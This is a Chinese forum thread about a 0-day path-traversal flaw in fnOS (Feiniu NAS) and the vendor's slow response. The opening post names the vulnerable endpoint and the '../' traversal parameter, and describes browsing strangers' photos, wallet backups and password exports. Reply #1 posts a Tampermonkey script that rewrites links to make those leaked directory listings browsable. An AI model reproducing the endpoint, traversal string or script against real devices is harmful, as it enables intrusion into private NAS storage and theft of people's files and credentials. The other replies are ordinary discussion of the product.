GoForum🌐 V2EX

飞牛 NAS 的信任危机, 0Day 漏洞导致用户 NAS 及网盘文件全面泄露,官方装死

ucaime · 2026-02-01 02:07 · 0 次点赞 · 9 条回复

8 年群晖正版老用户,今年做了个愚蠢的动作,出了用着极其稳定的群晖,换成 8 盘位飞牛,原因是系统开放,飞牛影视体验还不错。

昨天的 飞牛 0Day 事件之后,从各个社区、群获取到的信息看到了以下场面:

官方处理态度

  • 官方在极力掩饰,即使大量技术细节已被爆出的情况下,还在装死;
  • 漏洞能够追溯到 0.9 ,且飞牛有能力来尽快通知用户的情况下,仍然未关闭 fn connect ,目前根据扫描情况推算,仍有超过 90%的用户停留在 1.1.15 之前的版本,所有数据被看光光;

目前 0Day 导致的问题:

  • 公开到外网,能够直接访问的飞牛 NAS ,如果没有更新到最新的 1.1.15 版本,通过路径穿越漏洞可以被入侵者用极低的成本拿到 NAS 中的所有文件;
  • 即使没有公开到外网,fn connect 如果开启,依然能够通过官方 fn connect 来实现上面的入侵,隐私全面泄露。我尝试了一些常见的 name ,基本上全部成功看到了 NAS 中的照片、文件,甚至还看到了许多比特币钱包备份和恢复文件;
  • 基于上面的漏洞能够获取到用于登陆 cookie 加密计算的私钥,随便让 AI 搞了下,可以搞定模拟登陆,进入到用户 NAS 并进行任意操作。目前看了被种马的都是通过这个路径~
  • 大量隐私、配置文件泄露,即使亡羊补牢,仍然会有很多隐患。例如我翻到了一个用户自部署的 Bitwaden 服务端及密码导出文件 json;
  • 很多飞牛用户挂载了网盘,通过这个漏洞可以直接访问已挂载的网盘文件~

决定

  • 立即断网飞牛,并在以后完全不再尝试。不是不能接受漏洞问题,而是官方态度决定了这个产品的上限。
  • 检查与隐私相关的其他服务,如果是来自于非知名厂商的产品,立即开始寻找替代品。
  • 告知身边所有还在使用飞牛服务的朋友,立即放弃;

这应该是亲身经历的最大规模的一次普通人信息泄露了。最近几天应该有大量的黑灰产玩家在全网扫描,获取资源了。

这是第一次呼吁大家放弃一个本来我在支持的一个产品。希望未来有个开源的 NAS 替代来满足需要吧~

9 条回复
ucaime · 2026-02-01 02:17
#1

这个简单的油猴脚本就可以正常浏览用户泄露文件了

// ==UserScript==
// @name         路径遍历链接修复工具
// @namespace    http://tampermonkey.net/
// @version      1.0
// @description  修复特定路径下的 LFI/目录遍历链接拼接问题
// @author       xxx
// @match        *://*/app-center-static/serviceicon/myapp/%7B0%7D/*
// @grant        none
// ==/UserScript==

(function() {
    'use strict';

    // 获取当前页面的查询参数,即 ?size=../../../../ 部分
    const currentSearch = window.location.search;
    // 获取当前页面的基础路径,即 /app-center-static/serviceicon/myapp/%7B0%7D/
    const currentPath = window.location.pathname;

    // 选取所有的 <a> 标签
    const links = document.querySelectorAll('a');

    links.forEach(link => {
        // 获取 HTML 中原本的 href 属性值(例如 "vol1/" 或 "bin"),而非浏览器解析后的完整 URL
        const rawHref = link.getAttribute('href');

        if (rawHref) {
            // 核心逻辑:基础路径 + 原有查询参数 + 目标文件路径
            // 结果:.../myapp/%7B0%7D/?size=../../../../vol1/
            const newUrl = currentPath + currentSearch + rawHref;

            // 修改链接的指向
            link.href = newUrl;
        }
    });

    console.log(`已修正 ${links.length} 个路径遍历链接。`);
})();
Puteulanus · 2026-02-01 03:07
#2

系统开放是怎么来的 😂,感觉飞牛那个系统不是封闭得一逼

群晖自己系统和套件都有 API 文档,套件不管是手动上传安装,还是第三方源,也能算是开放;飞牛现在第三方用的包括影视的 API 好像都是逆向出来的,套件也刚加入手动上传安装没多久吧,加之前就只能装官方商店的

飞牛影视是好用,我之前给朋友那边虚拟机装了一个,远程挂载媒体库嫖它个播放器,然后有了媒体库更新之后飞牛的影视库没法及时刷新的问题,想找找它刷新媒体库的 API ,发现压根没有开放的,基本上你就是得实现它签名的算法模拟它 App 来操作,发了个帖子问了下也没后文了 https://club.fnnas.com/forum.php?mod=viewthread&tid=45408

NyanMisaka · 2026-02-01 03:27
#3

@Puteulanus 理念不等于实践,听说过 OpenAI 吗,可太 Open 了😅

LnTrx · 2026-02-01 06:02
#4

fnOS 的 nginx 日志在 /usr/trim/nginx/logs/access.log ,可以借此查看有多少人来“共襄盛举”了

fishcat · 2026-02-01 06:22
#5

为什么不继续用群晖了群晖是有啥问题吗

someonesnone · 2026-02-01 07:12
#6

一直都在用群晖

xuromky · 2026-02-01 07:47
#7

我看又发布了新版本

sn0wdr1am · 2026-02-01 07:47
#8

飞牛看起来确实伤人心,操作跟鸵鸟一样,遇到危险,把头埋在土里。

liyouran · 2026-02-01 07:52
#9

从 fnos 发布就在关注,在虚拟机上试了下,不符合我的习惯就再没用过,还好没用|ʘᗝʘ|。fn 的权限管理也很抽象,感觉文件管理也乱乱的应用商店下的 APP 配置文件都找不到。 推荐等 fnos 啥时候出和 cloudflare 一样的故障分析报告了再考虑用吧

添加回复
你还需要 登录 后发表回复

登录后可发帖和回复

登录 注册
主题信息
作者: ucaime
发布: 2026-02-01
点赞: 0
回复: 0